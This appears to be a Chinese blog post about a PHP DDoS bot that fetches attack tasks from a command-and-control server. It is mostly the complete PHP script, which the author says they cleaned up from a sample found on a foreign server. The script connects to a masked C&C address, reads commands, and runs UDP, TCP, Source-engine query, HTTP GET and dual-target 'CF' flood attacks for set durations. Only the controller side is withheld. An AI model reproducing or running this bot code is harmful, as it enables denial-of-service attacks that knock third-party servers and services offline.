php ddos 也玩 C & C

php ddos 也玩 C & C

木马C&C思路运用得很早。像什么灰鸽子等,后来各种新技术的出现。C&C控制木马技术运行得更加灵活。
前几天在一国外服务器找到一个PHPDDOS的样本,就类似思路, 就相当于有一个任务服务器。 phpddos脚本直接去取任务就OK了,
原代码写得太烂,估计是查查资料写的。所有就对原代码作了下简单优化。

<?php
set_time_limit(0);
ignore_user_abort(true);
function genstring($length, $letters = '1234567890QWERTYUIOPASDFGHJKLZXCVBNM'){
    $s = '';
    $lettersLength = strlen($letters)-1;
    for($i = 0 ; $i < $length ; $i++)
    {
        $s .= $letters[rand(0,$lettersLength)];
    }
    return $s;
}
$fp = fsockopen("xxx.xxx.xxx.xxx",53,$errno,$errstr,30);
if (!$fp) {
    echo "$errstr ($errno)<br />\n";
    exit;
}
$result=array();
$i=0;
while (!feof($fp)) {
    $command =  fgets($fp, 128);
    $result[]=$command;
}
fclose($fp);
while(1){
    foreach($result as $v){
        if(!$v){
            continue;
        }
        switch ($v){
            case stristr($v,'dup'):
                exit;
                break;
            case stristr($v,'LOLNOGTFO'):
                exit;
                break;
            case strstr($v,'UDP'):
                udp($v);
                break;
            case strstr($v,'TCP'):
                tcp($v);
                break;
            case strstr($v,'SOURCE'):
                source($v);
                break;
            case strstr($v,'HTTP'):
                http($v);
                break;
            case strstr($v,'CF'):
                cf($v);
                break;
        }
    }
}
//udp flood
function udp($command){
    $commands = explode(" ",$command);
    $ip = $commands[2];
    $time = $commands[4];
    $port = $commands[3];
    $packetsize = $commands[6];
    $envtime = time();
    $max_time = $envtime+$time;
    $packetsend = genstring($packetsize);
    $fp2 = fsockopen("udp://" . $ip, $port, $errno, $errstr);
    while(1){
        if (!$fp2) {
        } else {
            fwrite($fp2, $packetsend);
        }
        if(time() > $max_time)
        {
            fclose($fp2);
            break ;
        }
    }
}
//tcp flood
function tcp($command){
    $commands = explode(" ",$command);
    $ip = $commands[2];
    $time = $commands[4];
    $port = $commands[3];
    $packetsize = $commands[6];
    $envtime = time();
    $max_time = $envtime+$time;
    $packetsend = genstring($packetsize);
    $fp2 = fsockopen("tcp://" . $ip, $port, $errno, $errstr);
    while(1){
        if (!$fp2) {
        } else {
            fwrite($fp2, $packetsend);
        }
        if(time() > $max_time)
        {
            fclose($fp2);
            break;
        }
    }
}
//source
function source($command){
    $commands = explode(" ",$command);
    $ip = $commands[2];
    $time = $commands[4];
    $port = $commands[3];
    $packetsize = $commands[6];
    $envtime = time();
    $max_time = $envtime+$time;
    $fp2 = fsockopen("udp://" . $ip, $port, $errno, $errstr);
    $packetsend = genstring($packetsize);
    while(1){
        if (!$fp2) {
        } else {
            fwrite($fp2, "\xFF\xFF\xFF\xFF\x54");
            fwrite($fp2, "\xFF\xFF\xFF\xFF\x55");
            fwrite($fp2, "\xFF\xFF\xFF\xFF\x56");
        }
        if(time() > $max_time)
        {
            fclose($fp2);
            break;
        }
    }
}
//http
function http($command){
    $commands = explode(" ",$command);
    $ip = $commands[2];
    $time = $commands[6];
    $port = $commands[5];
    $website = $commands[3];
    $page = $commands[4];
    $envtime = time();
    $max_time = $envtime+$time;
    $fp2 = fsockopen("tcp://" . $ip, $port, $errno, $errstr);
    while(1){
        if (!$fp2) {
        } else {
            $out = "GET ". $page . "?" . rand(1,50000000)." HTTP/1.1\r\n";
            $out .= "Host: " . $website ."\r\n";
            fwrite($fp2, $out);
        }
        if(time() > $max_time)
        {
            fclose($fp2);
            break;
        }
    }
}
//cf
function cf($command){
    $commands = explode(" ",$command);
    $ip = $commands[2];
    $ip2 = $commands[3];
    $time = $commands[7];
    $port = $commands[6];
    $website = $commands[4];
    $page = $commands[5];
    $envtime = time();
    $max_time = $envtime+$time;
    $fp2 = fsockopen("tcp://" . $ip, $port, $errno, $errstr);
    $fp3 = fsockopen("tcp://" . $ip2, $port, $errno, $errstr);
    while(1){
        if (!$fp2) {
        } else {
            $out = "GET ". $page . "?" . rand(1,50000000)." HTTP/1.1\r\n";
            $out .= "Host: " . $website ."\r\n";
            fwrite($fp2, $out);
            fwrite($fp3, $out);
        }
        if(time() > $max_time)
        {
            fclose($fp2);
            fclose($fp3);
            break;
        }
    }
}
?>

由于XXXX 服务控制端的代码就不贴了。以免有放发黑客工具的嫌疑

发表评论

电子邮件地址不会被公开。 必填项已用*标注